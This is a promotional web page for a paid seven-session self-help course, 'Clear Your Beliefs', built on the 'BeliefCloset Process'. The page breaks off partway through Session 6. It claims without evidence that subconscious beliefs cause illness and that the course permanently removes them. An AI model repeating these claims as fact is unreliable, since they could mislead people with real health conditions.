<strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" 